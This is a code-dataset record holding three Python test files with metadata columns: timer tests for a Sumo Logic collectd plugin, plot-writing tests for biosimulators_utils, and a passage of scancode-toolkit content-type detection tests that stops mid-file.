| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 1
|
0
| 9
|
b86a88d608b66c039e37a7cbfed14bb59c971731
| 784
|
py
|
Python
|
test/test_timer.py
|
rakesh-padwal/sumologic-collectd-plugin
|
336f1e87fa1a27777f2cb668cee71f307e6d380a
|
[
"Apache-2.0"
] | null | null | null |
test/test_timer.py
|
rakesh-padwal/sumologic-collectd-plugin
|
336f1e87fa1a27777f2cb668cee71f307e6d380a
|
[
"Apache-2.0"
] | null | null | null |
test/test_timer.py
|
rakesh-padwal/sumologic-collectd-plugin
|
336f1e87fa1a27777f2cb668cee71f307e6d380a
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
from sumologic_collectd_metrics.timer import Timer
def test_cancel_timer_normal():
timer = Timer(0.1, task)
timer.start_timer()
assert timer.timer is not None
timer.cancel_timer()
def test_cancel_timer_not_start():
timer = Timer(0.1, task)
assert timer.timer is None
timer.cancel_timer()
def test_reset_timer_normal():
timer = Timer(0.1, task)
timer.start_timer()
assert timer.timer is not None
timer.reset_timer()
assert timer.timer is not None
timer.cancel_timer()
def test_reset_timer_not_start():
timer = Timer(0.1, task)
assert timer.timer is None
timer.reset_timer()
assert timer.timer is not None
timer.cancel_timer()
def task():
print('Timer task ... ')
| 16
| 50
| 0.674745
| 115
| 784
| 4.391304
| 0.2
| 0.19802
| 0.190099
| 0.213861
| 0.867327
| 0.819802
| 0.819802
| 0.819802
| 0.764356
| 0.764356
| 0
| 0.01473
| 0.220663
| 784
| 48
| 51
| 16.333333
| 0.811784
| 0.026786
| 0
| 0.72
| 0
| 0
| 0.019711
| 0
| 0
| 0
| 0
| 0
| 0.24
| 1
| 0.2
| false
| 0
| 0.04
| 0
| 0.24
| 0.04
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
b889e166d1d975864c616ebbaea07770031c7f3f
| 7,392
|
py
|
Python
|
tests/plot/test_plot_io.py
|
virtualcell/Biosimulators_utils
|
1b34e1e0a9ace706d245e9d515d0fae1e55a248d
|
[
"MIT"
] | null | null | null |
tests/plot/test_plot_io.py
|
virtualcell/Biosimulators_utils
|
1b34e1e0a9ace706d245e9d515d0fae1e55a248d
|
[
"MIT"
] | null | null | null |
tests/plot/test_plot_io.py
|
virtualcell/Biosimulators_utils
|
1b34e1e0a9ace706d245e9d515d0fae1e55a248d
|
[
"MIT"
] | null | null | null |
from biosimulators_utils.plot import io
from biosimulators_utils.plot.data_model import PlotFormat
from biosimulators_utils.report.data_model import DataGeneratorResults
from biosimulators_utils.sedml.data_model import Plot2D, Curve, Plot3D, Surface, AxisScale, DataGenerator
import numpy
import os
import shutil
import tempfile
import unittest
class PlotIoTestCase(unittest.TestCase):
def setUp(self):
self.dirname = tempfile.mkdtemp()
def tearDown(self):
shutil.rmtree(self.dirname)
def test_write_plot_2d_one_curve(self):
time = DataGenerator(id='time')
species_a = DataGenerator(id='species_a')
plot = Plot2D(
id='plot_1',
curves=[
Curve(
id='curve_1',
name='Curve 1',
x_data_generator=time,
y_data_generator=species_a,
x_scale=AxisScale.linear,
y_scale=AxisScale.linear,
),
]
)
data_gen_results = DataGeneratorResults()
data_gen_results[time.id] = numpy.linspace(0., 10., 100 + 1)
data_gen_results[species_a.id] = numpy.sin(data_gen_results[time.id])
base_path = self.dirname
rel_path = 'path/to/sim.sedml/' + plot.id
format = PlotFormat.pdf
io.write_plot_2d(plot, data_gen_results, base_path, rel_path, format=format)
self.assertTrue(os.path.isfile(os.path.join(base_path, 'path/to/sim.sedml/plot_1.pdf')))
def test_write_plot_2d_multiple_curves(self):
time = DataGenerator(id='time')
species_a = DataGenerator(id='species_a')
species_b = DataGenerator(id='species_b')
plot = Plot2D(
id='plot_1',
curves=[
Curve(
id='curve_1',
name='Curve 1',
x_data_generator=time,
y_data_generator=species_a,
x_scale=AxisScale.linear,
y_scale=AxisScale.linear,
),
Curve(
id='curve_2',
name='Curve 2',
x_data_generator=time,
y_data_generator=species_b,
x_scale=AxisScale.linear,
y_scale=AxisScale.linear,
),
]
)
data_gen_results = DataGeneratorResults()
data_gen_results[time.id] = numpy.linspace(0., 10., 100 + 1)
data_gen_results[species_a.id] = numpy.sin(data_gen_results[time.id])
data_gen_results[species_b.id] = numpy.cos(data_gen_results[time.id])
base_path = self.dirname
rel_path = 'path/to/sim.sedml/' + plot.id
format = PlotFormat.pdf
io.write_plot_2d(plot, data_gen_results, base_path, rel_path, format=format)
self.assertTrue(os.path.isfile(os.path.join(base_path, 'path/to/sim.sedml/plot_1.pdf')))
def test_write_plot_2d_mixed_axes(self):
species_a = DataGenerator(id='species_a')
species_b = DataGenerator(id='species_b')
plot = Plot2D(
id='plot_1',
curves=[
Curve(
id='curve_1',
name='Curve 1',
x_data_generator=species_a,
y_data_generator=species_a,
x_scale=AxisScale.linear,
y_scale=AxisScale.log,
),
Curve(
id='curve_2',
name='Curve 2',
x_data_generator=species_b,
y_data_generator=species_b,
x_scale=AxisScale.log,
y_scale=AxisScale.linear,
),
]
)
data_gen_results = DataGeneratorResults()
time = numpy.linspace(0., 10., 100 + 1)
data_gen_results[species_a.id] = numpy.sin(time)
data_gen_results[species_b.id] = numpy.cos(time)
base_path = self.dirname
rel_path = 'path/to/sim.sedml/' + plot.id
format = PlotFormat.pdf
io.write_plot_2d(plot, data_gen_results, base_path, rel_path, format=format)
self.assertTrue(os.path.isfile(os.path.join(base_path, 'path/to/sim.sedml/plot_1.pdf')))
def test_write_plot_3d_one_surface(self):
x = DataGenerator(id='x')
y = DataGenerator(id='y')
species_a = DataGenerator(id='species_a')
plot = Plot3D(
id='plot_1',
surfaces=[
Surface(
id='surface_1',
name='Surface 1',
x_data_generator=x,
y_data_generator=y,
z_data_generator=species_a,
x_scale=AxisScale.linear,
y_scale=AxisScale.linear,
z_scale=AxisScale.linear,
),
]
)
X = numpy.arange(-5, 5, 0.25)
Y = numpy.arange(-5, 5, 0.25)
X, Y = numpy.meshgrid(X, Y)
Z = numpy.sin(numpy.sqrt(X**2 + Y**2))
data_gen_results = DataGeneratorResults()
data_gen_results[x.id] = X
data_gen_results[y.id] = Y
data_gen_results[species_a.id] = Z
base_path = self.dirname
rel_path = 'path/to/sim.sedml/' + plot.id
format = PlotFormat.pdf
io.write_plot_3d(plot, data_gen_results, base_path, rel_path, format=format)
self.assertTrue(os.path.isfile(os.path.join(base_path, 'path/to/sim.sedml/plot_1.pdf')))
def test_write_plot_3d_multiple_surfaces(self):
x = DataGenerator(id='x')
y = DataGenerator(id='y')
species_a = DataGenerator(id='species_a')
species_b = DataGenerator(id='species_b')
plot = Plot3D(
id='plot_1',
surfaces=[
Surface(
id='surface_1',
name='Surface 1',
x_data_generator=x,
y_data_generator=y,
z_data_generator=species_a,
x_scale=AxisScale.linear,
y_scale=AxisScale.linear,
z_scale=AxisScale.linear,
),
Surface(
id='surface_2',
name='Surface 2',
x_data_generator=y,
y_data_generator=x,
z_data_generator=species_b,
x_scale=AxisScale.log,
y_scale=AxisScale.log,
z_scale=AxisScale.log,
),
],
)
X = numpy.arange(-5, 5, 0.25)
Y = numpy.arange(-5, 5, 0.25)
X, Y = numpy.meshgrid(X, Y)
A = numpy.sin(numpy.sqrt(X**2 + Y**2))
B = numpy.cos(numpy.sqrt(X**2 + Y**2))
data_gen_results = DataGeneratorResults()
data_gen_results[x.id] = X
data_gen_results[y.id] = Y
data_gen_results[species_a.id] = A
data_gen_results[species_b.id] = B
base_path = self.dirname
rel_path = 'path/to/sim.sedml/' + plot.id
format = PlotFormat.pdf
io.write_plot_3d(plot, data_gen_results, base_path, rel_path, format=format)
self.assertTrue(os.path.isfile(os.path.join(base_path, 'path/to/sim.sedml/plot_1.pdf')))
| 33.908257
| 105
| 0.540584
| 871
| 7,392
| 4.323766
| 0.092997
| 0.050186
| 0.100372
| 0.034519
| 0.842539
| 0.837759
| 0.831386
| 0.831386
| 0.788901
| 0.788901
| 0
| 0.018908
| 0.356061
| 7,392
| 217
| 106
| 34.064516
| 0.772269
| 0
| 0
| 0.741758
| 0
| 0
| 0.063312
| 0.018939
| 0
| 0
| 0
| 0
| 0.027473
| 1
| 0.038462
| false
| 0
| 0.049451
| 0
| 0.093407
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b898e068680cc5214a74098985fe039b4239d651
| 55,268
|
py
|
Python
|
tests/typecode/test_contenttype.py
|
nicoddemus/scancode-toolkit
|
58dfec66faa2c8a90f1125861081266594a1e1d7
|
[
"Apache-2.0",
"CC0-1.0"
] | null | null | null |
tests/typecode/test_contenttype.py
|
nicoddemus/scancode-toolkit
|
58dfec66faa2c8a90f1125861081266594a1e1d7
|
[
"Apache-2.0",
"CC0-1.0"
] | null | null | null |
tests/typecode/test_contenttype.py
|
nicoddemus/scancode-toolkit
|
58dfec66faa2c8a90f1125861081266594a1e1d7
|
[
"Apache-2.0",
"CC0-1.0"
] | null | null | null |
#
# Copyright (c) 2018 nexB Inc. and others. All rights reserved.
# http://nexb.com and https://github.com/nexB/scancode-toolkit/
# The ScanCode software is licensed under the Apache License version 2.0.
# Data generated with ScanCode require an acknowledgment.
# ScanCode is a trademark of nexB Inc.
#
# You may not use this software except in compliance with the License.
# You may obtain a copy of the License at: http://apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software distributed
# under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
# CONDITIONS OF ANY KIND, either express or implied. See the License for the
# specific language governing permissions and limitations under the License.
#
# When you publish or redistribute any data created with ScanCode or any ScanCode
# derivative work, you must accompany this data with the following acknowledgment:
#
# Generated with ScanCode and provided on an "AS IS" BASIS, WITHOUT WARRANTIES
# OR CONDITIONS OF ANY KIND, either express or implied. No content created from
# ScanCode should be considered or used as legal advice. Consult an Attorney
# for any legal advice.
# ScanCode is a free software code scanning tool from nexB Inc. and others.
# Visit https://github.com/nexB/scancode-toolkit/ for support and download.
from __future__ import absolute_import
from __future__ import print_function
from __future__ import unicode_literals
import os
from unittest.case import skipIf
from unittest.case import expectedFailure
from commoncode.testcase import FileBasedTesting
from commoncode.system import on_linux
from commoncode.system import on_mac
from commoncode.system import on_windows
from typecode.contenttype import get_filetype
from typecode.contenttype import get_type
from typecode.contenttype import get_pygments_lexer
from typecode.contenttype import is_standard_include
# aliases for testing
get_mimetype_python = lambda l: get_type(l).mimetype_python
get_filetype_pygment = lambda l: get_type(l).filetype_pygment
get_filetype_file = lambda l: get_type(l).filetype_file
get_mimetype_file = lambda l: get_type(l).mimetype_file
is_text = lambda l: get_type(l).is_text
is_archive = lambda l: get_type(l).is_archive
is_compressed = lambda l: get_type(l).is_compressed
is_media = lambda l: get_type(l).is_media
is_winexe = lambda l: get_type(l).is_winexe
is_source = lambda l: get_type(l).is_source
is_script = lambda l: get_type(l).is_script
is_special = lambda l: get_type(l).is_special
is_pdf = lambda l: get_type(l).is_pdf
is_pdf_with_text = lambda l: get_type(l).is_pdf_with_text
is_binary = lambda l: get_type(l).is_binary
is_c_source = lambda l: get_type(l).is_c_source
is_stripped_elf = lambda l: get_type(l).is_stripped_elf
is_elf = lambda l: get_type(l).is_elf
elf_type = lambda l: get_type(l).elf_type
get_link_target = lambda l: get_type(l).link_target
is_link = lambda l: get_type(l).is_link
is_broken_link = lambda l: get_type(l).is_broken_link
size = lambda l: get_type(l).size
contains_text = lambda l: get_type(l).contains_text
is_data = lambda l: get_type(l).is_data
is_js_map = lambda l: get_type(l).is_js_map
class TestContentType(FileBasedTesting):
test_data_dir = os.path.join(os.path.dirname(__file__), 'data')
def test_size(self):
test_dir = self.get_test_loc('contenttype/size')
result = size(test_dir)
assert 18 == result
def test_filetype_file_on_unicode_file_name(self):
test_zip = self.extract_test_zip('contenttype/unicode/unicode.zip')
test_dir = os.path.join(test_zip, 'a')
f = os.listdir(test_dir)[0]
test_file = os.path.join(test_dir, f)
assert os.path.exists(test_file)
expected = 'PNG image data, 16 x 12, 8-bit/color RGBA, interlaced'
if on_windows:
# FIXME: this is a very short png file though
expected = 'Non-ISO extended-ASCII text'
assert expected == get_filetype_file(test_file)
expected = 'image/png'
if on_windows:
# FIXME: this is a very short png file though
expected = 'text/plain'
assert expected == get_mimetype_file(test_file)
@skipIf(not on_linux, 'Windows and macOS have some issues with some non-unicode paths')
def test_filetype_file_on_unicode_file_name2(self):
zip_file_name = 'contenttype/unicode/unicode2.zip'
test_zip = self.extract_test_zip(zip_file_name.encode('utf-8'))
test_dir = os.path.join(test_zip, 'a')
f = [f for f in os.listdir(test_dir) if f.startswith('g')][0]
test_file = os.path.join(test_dir, f)
assert os.path.exists(test_file)
expected = 'PNG image data, 16 x 12, 8-bit/color RGBA, interlaced'
if on_windows:
# FIXME: this is a very short png file though
expected = 'Non-ISO extended-ASCII text'
assert expected == get_filetype_file(test_file)
expected = 'image/png'
if on_windows:
# FIXME: this is a very short png file though
expected = 'text/plain'
assert expected == get_mimetype_file(test_file)
@skipIf(on_windows, 'Windows does not have (well supported) links.')
def test_symbolink_links(self):
test_dir = self.extract_test_tar('contenttype/links/links.tar.gz', verbatim=True)
test_file1 = os.path.join(test_dir, 'prunedirs/targets/simlink_to_dir')
assert is_link(test_file1)
assert not is_broken_link(test_file1)
assert '../sources/subdir' == get_link_target(test_file1)
test_file2 = os.path.join(test_dir, 'prunedirs/targets/simlink_to_file')
assert is_link(test_file2)
assert not is_broken_link(test_file2)
assert '../sources/a.txt' == get_link_target(test_file2)
test_file3 = os.path.join(test_dir, 'prunedirs/targets/simlink_to_missing_file')
assert is_link(test_file3)
assert is_broken_link(test_file3)
assert '../sources/temp.txt' == get_link_target(test_file3)
test_file4 = os.path.join(test_dir, 'prunedirs/targets/simlink_to_missing_dir')
assert is_link(test_file4)
assert is_broken_link(test_file4)
assert '../sources/tempdir' == get_link_target(test_file4)
@skipIf(not on_windows, 'Hangs for now, for lack of proper sudo access on some test servers.')
@skipIf(on_windows, 'Windows does not have fifos.')
def test_contenttype_fifo(self):
test_dir = self.get_temp_dir()
myfifo = os.path.join(test_dir, 'myfifo')
import subprocess
if subprocess.call(['mkfifo', myfifo]) != 0:
self.fail('Unable to create fifo')
assert os.path.exists(myfifo)
assert is_special(myfifo)
assert 'FIFO pipe' == get_filetype(myfifo)
def test_directory(self):
test_file = self.get_test_loc('contenttype')
assert not is_binary(test_file)
assert not is_compressed(test_file)
assert not contains_text(test_file)
assert '' == get_filetype_pygment(test_file)
def test_archive_gnu_tar(self):
test_file = self.get_test_loc('contenttype/archive/e.tar')
assert 'posix tar archive (gnu)' == get_filetype(test_file)
assert is_binary(test_file)
assert is_archive(test_file)
assert not is_compressed(test_file)
assert contains_text(test_file)
assert '' == get_filetype_pygment(test_file)
def test_debian_package(self):
test_file = self.get_test_loc('contenttype/package/libjama-dev_1.2.4-2_all.deb')
assert 'debian binary package (format 2.0)' == get_filetype(test_file)
assert is_binary(test_file)
assert is_archive(test_file)
assert is_compressed(test_file)
assert not contains_text(test_file)
assert '' == get_filetype_pygment(test_file)
def test_package_json(self):
test_file = self.get_test_loc('contenttype/package/package.json')
assert 'ascii text, with very long lines' == get_filetype(test_file)
assert not is_binary(test_file)
assert '' == get_filetype_pygment(test_file)
assert not is_source(test_file)
def test_archive_gz(self):
test_file = self.get_test_loc('contenttype/archive/file_4.26-1.diff.gz')
assert get_filetype(test_file).startswith('gzip compressed data')
assert is_binary(test_file)
assert is_archive(test_file)
assert is_compressed(test_file)
assert not contains_text(test_file)
assert '' == get_filetype_pygment(test_file)
@skipIf(on_windows, 'fails because of libmagic bug on windows.')
def test_archive_squashfs_crashing(self):
test_file = self.get_test_loc('contenttype/archive/crashing-squashfs')
assert get_filetype_file(test_file).startswith('Squashfs filesystem, little endian, version 4.0')
assert is_archive(test_file)
assert is_compressed(test_file)
assert not contains_text(test_file)
assert '' == get_filetype_pygment(test_file)
@skipIf(on_windows, 'fails because of libmagic bug on windows.')
def test_archive_squashfs_gz(self):
test_file = self.get_test_loc('contenttype/archive/sqfs-gz.sqs')
assert get_filetype_file(test_file).startswith('Squashfs filesystem, little endian, version 4.0')
assert is_archive(test_file)
assert is_compressed(test_file)
assert not contains_text(test_file)
assert '' == get_filetype_pygment(test_file)
@skipIf(on_windows, 'fails because of libmagic bug on windows.')
def test_archive_squashfs_lzo(self):
test_file = self.get_test_loc('contenttype/archive/sqfs-lzo.sqs')
assert get_filetype_file(test_file).startswith('Squashfs filesystem, little endian, version 4.0')
assert is_archive(test_file)
assert is_compressed(test_file)
assert not contains_text(test_file)
assert '' == get_filetype_pygment(test_file)
@skipIf(on_windows, 'fails because of libmagic bug on windows.')
def test_archive_squashfs_xz(self):
test_file = self.get_test_loc('contenttype/archive/sqfs-xz.sqs')
assert get_filetype_file(test_file).startswith('Squashfs filesystem, little endian, version 4.0')
assert is_archive(test_file)
assert is_compressed(test_file)
assert not contains_text(test_file)
assert '' == get_filetype_pygment(test_file)
def test_archive_tar_bz2(self):
test_file = self.get_test_loc('contenttype/archive/e.tar.bz2')
assert is_binary(test_file)
assert is_archive(test_file)
assert 'bzip2 compressed data, block size = 900k' == get_filetype(test_file)
assert is_compressed(test_file)
assert not contains_text(test_file)
assert '' == get_filetype_pygment(test_file)
def test_archive_tar_gz_1(self):
test_file = self.get_test_loc('contenttype/archive/a.tar.gz')
assert not is_source(test_file)
assert not is_text(test_file)
assert '' == get_filetype_pygment(test_file)
assert 'application/x-gzip' == get_mimetype_file(test_file)
assert get_filetype(test_file).startswith('gzip compressed data')
assert is_archive(test_file)
assert is_compressed(test_file)
assert not contains_text(test_file)
assert '' == get_filetype_pygment(test_file)
def test_archive_tar_gz_3(self):
test_file = self.get_test_loc('contenttype/archive/e.tar.gz')
assert is_binary(test_file)
assert is_archive(test_file)
assert get_filetype(test_file).startswith('gzip compressed data')
assert is_compressed(test_file)
assert not contains_text(test_file)
assert '' == get_filetype_pygment(test_file)
def test_archive_tar_posix_not_compressed(self):
test_file = self.get_test_loc('contenttype/archive/posixnotgnu.tar')
assert is_binary(test_file)
assert is_archive(test_file)
assert 'posix tar archive' == get_filetype(test_file)
assert not is_compressed(test_file)
assert contains_text(test_file)
assert '' == get_filetype_pygment(test_file)
def test_ar_archive_win_library(self):
test_file = self.get_test_loc('contenttype/archive/win-archive.lib')
assert is_binary(test_file)
assert is_archive(test_file)
assert 'current ar archive' == get_filetype(test_file)
assert not is_compressed(test_file)
assert contains_text(test_file)
assert '' == get_filetype_pygment(test_file)
def test_win_dll(self):
test_file = self.get_test_loc('contenttype/binary/windows.dll')
assert is_binary(test_file)
assert not is_archive(test_file)
assert not is_compressed(test_file)
assert contains_text(test_file)
assert '' == get_filetype_pygment(test_file)
def test_config_eclipse_data(self):
test_file = self.get_test_loc('contenttype/config/eclipse_configuration_3u.cfs')
assert is_binary(test_file)
assert 'data' == get_filetype(test_file)
assert contains_text(test_file)
assert '' == get_filetype_pygment(test_file)
def test_binary_data(self):
test_file = self.get_test_loc('contenttype/binary/data.fdt')
assert is_binary(test_file)
assert 'data' == get_filetype(test_file)
assert '' == get_filetype_pygment(test_file)
def test_binary_data_2(self):
test_file = self.get_test_loc('contenttype/binary/dbase.fdt')
assert 'data' == get_filetype(test_file)
assert '' == get_filetype_pygment(test_file)
def test_binary_java_serialized_data(self):
test_file = self.get_test_loc('contenttype/binary/jruby_time_zone_TimeOfDay.dat')
assert is_binary(test_file)
assert 'java serialization data, version 5' == get_filetype(test_file)
assert '' == get_filetype_pygment(test_file)
def test_binary_random_data(self):
assert 'data' == get_filetype(self.get_test_loc('contenttype/binary-random/binary_random_0'))
assert 'data' == get_filetype(self.get_test_loc('contenttype/binary-random/binary_random_1'))
assert 'data' == get_filetype(self.get_test_loc('contenttype/binary-random/binary_random_2'))
assert 'data' == get_filetype(self.get_test_loc('contenttype/binary-random/binary_random_3'))
assert 'data' == get_filetype(self.get_test_loc('contenttype/binary-random/binary_random_4'))
assert 'data' == get_filetype(self.get_test_loc('contenttype/binary-random/binary_random_5'))
assert 'data' == get_filetype(self.get_test_loc('contenttype/binary-random/binary_random_6'))
assert 'data' == get_filetype(self.get_test_loc('contenttype/binary-random/binary_random_7'))
assert 'data' == get_filetype(self.get_test_loc('contenttype/binary-random/binary_random_8'))
assert '' == get_filetype_pygment(self.get_test_loc('contenttype/binary-random/binary_random_8'))
def test_build_ant_build_xml(self):
test_file = self.get_test_loc('contenttype/build/build.xml')
assert not is_binary(test_file)
assert 'exported sgml document, ascii text, with crlf line terminators' == get_filetype(test_file)
assert '' == get_filetype_pygment(test_file)
assert is_text(test_file)
assert not is_source(test_file)
assert not is_script(test_file)
def test_build_makefile(self):
test_file = self.get_test_loc('contenttype/build/Makefile')
assert not is_source(test_file)
assert not is_script(test_file)
assert is_text(test_file)
assert '' == get_filetype_pygment(test_file)
assert 'ASCII text' == get_filetype_file(test_file)
assert 'ascii text' == get_filetype(test_file)
assert 'text/plain' == get_mimetype_file(test_file)
def test_build_makefile_2(self):
test_file = self.get_test_loc('contenttype/build/Makefile.inc')
assert is_text(test_file)
assert '' == get_filetype_pygment(test_file)
assert 'makefile script, ascii text, with crlf line terminators' == get_filetype(test_file)
assert 'text/x-makefile' == get_mimetype_file(test_file)
assert 'makefile script, ASCII text, with CRLF line terminators' == get_filetype_file(test_file)
assert not is_source(test_file)
def test_build_ide_makefile(self):
test_file = self.get_test_loc('contenttype/build/documentation.dsp')
assert 'ascii text' == get_filetype(test_file)
assert '' == get_filetype_pygment(test_file)
assert not is_source(test_file)
def test_build_java_maven_pom_pom(self):
test_file = self.get_test_loc('contenttype/build/pom.pom')
assert '' == get_filetype_pygment(test_file)
assert 'xml document text' == get_filetype(test_file)
assert not is_source(test_file)
def test_build_java_maven_pom_xml(self):
test_file = self.get_test_loc('contenttype/build/pom.xml')
assert not is_source(test_file)
assert 'exported sgml document, ascii text' == get_filetype(test_file)
assert '' == get_filetype_pygment(test_file)
def test_certificate_rsa_eclipse(self):
test_file = self.get_test_loc('contenttype/certificate/ECLIPSE.RSA')
assert is_binary(test_file)
assert 'data' == get_filetype(test_file)
assert '' == get_filetype_pygment(test_file)
def test_certificate(self):
test_file = self.get_test_loc('contenttype/certificate/CERTIFICATE')
assert is_binary(test_file)
assert 'data' == get_filetype(test_file)
assert '' == get_filetype_pygment(test_file)
def test_code_assembly(self):
test_file = self.get_test_loc('contenttype/code/assembly/bcopy.s')
assert 'C source, ASCII text, with CRLF line terminators' == get_filetype_file(test_file)
assert 'GAS' == get_filetype_pygment(test_file)
assert 'text/x-c' == get_mimetype_file(test_file)
assert is_source(test_file)
assert is_text(test_file)
def test_code_c_1(self):
test_file = self.get_test_loc('contenttype/code/c/c_code.c')
assert 'ti-xx graphing calculator (flash)' == get_filetype(test_file)
assert 'C++' == get_filetype_pygment(test_file)
assert is_source(test_file)
assert is_text(test_file)
def test_code_c_2(self):
test_file = self.get_test_loc('contenttype/code/c/main.c')
assert is_source(test_file)
assert is_text(test_file)
assert 'C++' == get_filetype_pygment(test_file)
assert 'c source, ascii text' == get_filetype(test_file)
assert 'C source, ASCII text' == get_filetype_file(test_file)
assert 'text/x-c' == get_mimetype_file(test_file)
def test_code_c_3(self):
test_file = self.get_test_loc('contenttype/code/c/cpu.c')
assert is_source(test_file)
assert is_text(test_file)
assert 'C++' == get_filetype_pygment(test_file)
assert 'c source, ascii text' == get_filetype(test_file)
assert 'text/x-c' == get_mimetype_file(test_file)
def test_code_c_4(self):
test_file = self.get_test_loc('contenttype/code/c/mm.c')
assert is_source(test_file)
assert is_text(test_file)
assert 'C++' == get_filetype_pygment(test_file)
assert 'c source, ascii text' == get_filetype(test_file)
assert 'text/x-c' == get_mimetype_file(test_file)
def test_code_c_5(self):
test_file = self.get_test_loc('contenttype/code/c/pci.c')
assert is_source(test_file)
assert is_text(test_file)
assert 'C source, ASCII text' == get_filetype_file(test_file)
assert 'C++' == get_filetype_pygment(test_file)
assert 'c source, ascii text' == get_filetype(test_file)
assert 'text/x-c' == get_mimetype_file(test_file)
def test_code_c_6(self):
test_file = self.get_test_loc('contenttype/code/c/pci_v3.c')
assert is_source(test_file)
assert is_text(test_file)
assert 'C source, ASCII text' == get_filetype_file(test_file)
assert 'C++' == get_filetype_pygment(test_file)
assert 'c source, ascii text' == get_filetype(test_file)
assert 'text/x-c' == get_mimetype_file(test_file)
def test_code_c_7(self):
test_file = self.get_test_loc('contenttype/code/c/some.c')
assert 'ti-xx graphing calculator (flash)' == get_filetype(test_file)
assert is_source(test_file)
assert 'C++' == get_filetype_pygment(test_file)
def test_code_c_include(self):
test_file = self.get_test_loc('contenttype/code/c/resource.h')
assert 'ascii text, with crlf line terminators' == get_filetype(test_file)
assert is_source(test_file)
assert 'C++' == get_filetype_pygment(test_file)
def test_code_c_include_2(self):
test_file = self.get_test_loc('contenttype/code/c/netdb.h')
assert 'very short file (no magic)' == get_filetype(test_file)
assert is_source(test_file)
assert 'C++' == get_filetype_pygment(test_file)
def test_code_c_include_mixed_case_2(self):
test_file = self.get_test_loc('contenttype/code/c/TEST_LOWERCASE.h')
assert 'c source, ascii text' == get_filetype(test_file)
assert 'C++' == get_filetype_pygment(test_file)
def test_code_cpp_include_mixed_case(self):
test_file = self.get_test_loc('contenttype/code/c/TEST.H')
assert 'c source, ascii text' == get_filetype(test_file)
assert 'C++' == get_filetype_pygment(test_file)
def test_code_cpp_mixed_case(self):
test_file = self.get_test_loc('contenttype/code/c/SIMPLE.C')
assert 'c source, ascii text' == get_filetype(test_file)
assert 'C++' == get_filetype_pygment(test_file)
def test_code_cpp_mixed_case_2(self):
test_file = self.get_test_loc('contenttype/code/cpp/string.CPP')
expected = 'c source, ascii text'
if on_mac:
expected = 'c++ source, ascii text'
assert expected == get_filetype(test_file)
assert 'C++' == get_filetype_pygment(test_file)
def test_code_cpp_1(self):
test_file = self.get_test_loc('contenttype/code/cpp/stacktrace.cpp')
assert is_source(test_file)
assert is_text(test_file)
assert 'C++' == get_filetype_pygment(test_file)
assert 'c source, ascii text' == get_filetype(test_file)
assert 'text/x-c' == get_mimetype_file(test_file)
def test_code_cpp_non_ascii(self):
test_file = self.get_test_loc('contenttype/code/cpp/non_ascii.cpp')
assert is_source(test_file)
assert is_text(test_file)
assert 'application/octet-stream' == get_mimetype_file(test_file)
assert 'C++' == get_filetype_pygment(test_file)
assert 'data' == get_filetype(test_file)
def test_code_cpp_stdafx(self):
test_file = self.get_test_loc('contenttype/code/cpp/StdAfx.cpp')
assert 'c source, ascii text' == get_filetype(test_file)
assert 'C++' == get_filetype_pygment(test_file)
def test_code_groff(self):
test_file = self.get_test_loc(u'contenttype/code/groff/example.ms')
assert not is_special(test_file)
assert is_text(test_file)
assert 'troff or preprocessor input, ascii text' == get_filetype(test_file)
assert 'GAS' == get_filetype_pygment(test_file)
# the Apache mimes do not have .ms in their types
# but the type is still mysteriously returnedd on Windows
assert 'text/troff' == get_mimetype_python(test_file)
assert 'text/troff' == get_mimetype_file(test_file)
assert get_filetype_file(test_file).startswith('troff or preprocessor input')
def test_code_java_1(self):
test_file = self.get_test_loc('contenttype/code/java/contenttype.java')
assert not is_binary(test_file)
assert 'ascii text' == get_filetype(test_file)
assert 'Java' == get_filetype_pygment(test_file)
def test_code_java_non_ascii(self):
test_file = self.get_test_loc('contenttype/code/java/ChartTiming1.java')
assert is_source(test_file)
assert is_text(test_file)
# FIXME: incorrect
assert 'application/octet-stream' == get_mimetype_file(test_file)
assert 'data' == get_filetype(test_file)
assert 'Java' == get_filetype_pygment(test_file)
def test_code_java_3(self):
test_file = self.get_test_loc('contenttype/code/java/Appender.java')
assert 'ascii text' == get_filetype(test_file)
assert 'Java' == get_filetype_pygment(test_file)
def test_code_java_jad(self):
test_file = self.get_test_loc('contenttype/code/java/CommonViewerSiteFactory.jad')
assert 'ascii text' == get_filetype(test_file)
# FIXME: should this be Java code?
assert 'Python' == get_filetype_pygment(test_file)
def test_code_java_mixed_case(self):
test_file = self.get_test_loc('contenttype/code/java/Logger.JAVA')
assert 'ascii text' == get_filetype(test_file)
assert 'Java' == get_filetype_pygment(test_file)
def test_code_js(self):
test_file = self.get_test_loc('contenttype/code/js/a.js')
assert not is_media(test_file)
assert 'ascii text, with crlf line terminators' == get_filetype(test_file)
assert 'JavaScript' == get_filetype_pygment(test_file)
def test_code_python_1(self):
test_file = self.get_test_loc('contenttype/code/python/contenttype.py')
assert not is_binary(test_file)
assert 'Python' == get_pygments_lexer(test_file).name
assert 'Python' == get_filetype_pygment(test_file)
def test_code_python_2(self):
test_file = self.get_test_loc('contenttype/code/python/extract.py')
assert is_source(test_file)
assert is_text(test_file)
assert 'Python' == get_filetype_pygment(test_file)
assert 'python script, ascii text executable' == get_filetype(test_file)
assert 'text/x-python' == get_mimetype_file(test_file)
assert get_filetype_file(test_file).startswith('Python script')
def test_code_python_3(self):
test_file = self.get_test_loc('contenttype/code/python/__init__.py')
assert 'python script, ascii text executable' == get_filetype(test_file)
assert 'Python' == get_filetype_pygment(test_file)
def test_code_resource(self):
